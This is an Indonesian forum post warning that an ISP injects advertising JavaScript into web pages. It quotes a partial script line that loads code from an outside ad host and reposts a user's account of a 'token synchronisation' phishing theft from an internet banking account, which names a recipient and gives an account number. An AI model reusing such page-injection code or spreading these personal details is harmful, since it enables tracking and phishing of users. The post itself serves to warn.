yg pakai sp*edy coba buka:
Spoiler for url
http://www.addic7ed.com/serie/Madam_Secretary/1/14/Whisper_of_the_Ax
Spoiler for hasilnya
berbeda kalau ane gunakan hideme.be, hasilnya orisinil, tanpa embel-embel, persis seperti sebelumnya.
Spoiler for originally
Spoiler for contoh lain
yg terinfeksi:
yg orisinil
setelah ane telusuri script halaman terinfeksi, yg menyebabkan halaman tsb tetap blank putih, ane temukan:
Code:
th.floor(Math.random()*99999999999);[removed]("<scr"+"ipt type=text/javascript src="+idc_glo_url+ "cfs.u-ad.info/cfspushadsv2/request");[removed]("?Spoiler for halaman kaskus ini pun dia inject
bukti bahwa halaman kaskus pun terinject
page(html) sourcenya:
page(html) sourcenya:
cfs.u-ad.info - baca:
Code:
http://www.kaskus.co.id/thread/528795df59cb17cb63000003/hati-hati-inject-javascript-oleh-isp/
http://tekno.kompas.com/read/2014/10/05/12225317/Google.Indonesia.Dibajak.Kok.Cuma.di.Speedy.
bayangkan aja, hal ini tentunya bisa diexploitasi dan digunakan untuk memata-matai semua user internet yang ada di Indonesia yang ter INFEKSI INTERNET POSITIF. judulnya saja yang POSITIF, tetapi dampaknya sangat negatif. bahkan apabila dikaji dan dikembangkan lagi, hal ini bisa digunakan untuk melakukan phising(menangkap isi) form login/password yang diinput pada halaman website. ane rasa sudah saatnya "internet positif" dipertanyakan.
Spoiler for WARNING: phising yg lagi ngetrend
NB: dugaan sementara, hal ini disebabkan oleh virus, belum ada bukti bahwa ini dilakukan ISP tertentu, tetapi tentunya jika dikombinasikan dengan metode di atas, script phising ini *berpotensi* di-injeksi ke dalam halaman html internet banking.
Spoiler for warning!!!
#copas
WARNING!!!
Buat yang sering menggunakan e-banking...
Share ya,
Kronologis Kejahatan Internet
(Transaksi internet banking BCA)
1. Pada hari itu, Selasa, 24 Pebruari 2015 ; pada sekitar jam 11.00 siang, saya seperti biasa melakukan cek mutasi di rekening BCA untuk kebutuhan jual beli online.
2. Saya menghidupkan laptop yang OSnya WINDOWS 7 dan menggunakan mozilla sebagai browsernya. Kemudian saya membuka internet banking BCA untuk login melalui bookmark
3. Saya mengetik user ID dan nomer Pin seperti biasa
4. Tapi ketika hendak masuk login, muncul tampilan untuk memasukkan token dengan tulisan “ SINKRONISASI TOKEN”
5. Saya berpikir ini tidak wajar, lalu saya berusaha menutup dan mendelete tampilan tersebut tapi tidak biasa
6. Kemudian saya tutup mozila dan mengerjakan yang lain
7. Karena kebutuhan cek mutasi mendesak, saya buka lagi mozila, internet banking BCA dan ketika hendak login muncul lagi, ada tampilan yang sama dengan tulisan “sinkronisasi token”
8. Tampilannya mirip dengan internet banking bca dengan tulisan warna biru
9. Saya pikir memang kejadian ini (sinkronisasi token) benar benar dari BCA.
10. Tampilan itu meminta untuk mengetik token, kemudian apply 2 , prosesnya cukup lama sekitar 5 menit (sempat saya tinggal untuk mengerjakan yang lain)
11. Tujuh menit kemudian saya kembali ke laptop dan ada perintah apply 1. Ini juga prosesnya lama.
12. Setelah itu, tampilan meminta memasukan token lagi. Proses memasukan token ini saya lakukan dua kali, dan semuanya cukup lama prosesnya.
13. Karena prosesnya tidak selesai selesai alias lama, maka saya tutup mozila. Setelah itu, saya mau buka lagi mozila, tetapi tidak bisa. Akhirnya, laptop saya matikan paksa dan saya restart.
14. Setelah laptop hidup, saya buka mozila bisa. Dan tampilan “sinkronisasi token” sudah tidak tampil. Kemudian saya login internet banking bca untuk cek mutasi seperti tujuan awal.
15. Betapa terkejutnya saya ketika melihat ada transaksi debet yang tidak pernah saya lakukan
16. Transaksi itu baru saja terjadi pada saat saya hendak loging beberapa saat yang lalu
17. Transaksi itu berupa transfer ke rekening orang yang tidak saya kenal yang bernama HERU HERYUDONO sebesar 13.000.000 (tiga belas juta rupiah) dengan nomor rekening 02798503538 Bank BNI Syariah.
24/02 TRSF E-BANKING DB
2402/FTLLG/0000100
4270247PT. BANK BN
TRANSFER VIA LLG
REF NO PPU :JQCP
Heru Heryudono 0000 13,000,000.00 DB 481,891.20
24/02 BA JASA E-BANKING
2402/DMCHG/0000100BIAYA TRANSFER KU 0000 5,000.00 DB 476,891.20
18. Karena saya tidak kenal Heru Heryudono, maka saat itu juga saya telp HALLO BCA di nomor 021-500888 dan saya menceritakan kronologi kasus yang saya alami. Kemudian laporan saya diterima dengan nomor 21374998XXX.
19. Saya juga telpon ke BNI SYARIAH untuk membuat laporan seperti yang disarankan pihak BCA. Namun, pihak BNI belum mau menerima laporan jika pihak BCA belum secara resmi memberi laporan atas kasus saya, sehingga pihak BNI menunggu dari pihak BCA.
20. Pihak BCA juga meminta untuk segera mengganti PIN internet banking BCA dengan laptop/komputer lain, dan itu sudah saya lakukan saat itu juga.
21. Namun, laptop pertama yang saya pakai untuk cek mutasi, tiba tiba restart terus menerus. Tidak bisa dipakai. Seperti ada virusnya yang merusak system operasi windowsnya.
22. Saat ini kasus telah dilaporkan ke kepolisian, masuk ke desk cyber crime polda metro dan polda jatim. (ternyata polres gak bisa menangani kasus yang berkaitan dg cyber crime)
23. Demikian laporan saya atas peristiwa kejahatan internet yang saya alami. Semoga jadi pembelajaran semua…
Hormat saya
Edy musyadad
Spoiler for BCA: Waspadai Sinkronisasi Token
http://bisniskeuangan.kompas.com/read/2015/03/04/144553726/BCA.Minta.Nasabah.Waspadai.Sinkronisasi.Token.saat.Membuka.Internet.Banking
Spoiler for screenshot terjadi di mandiri online juga
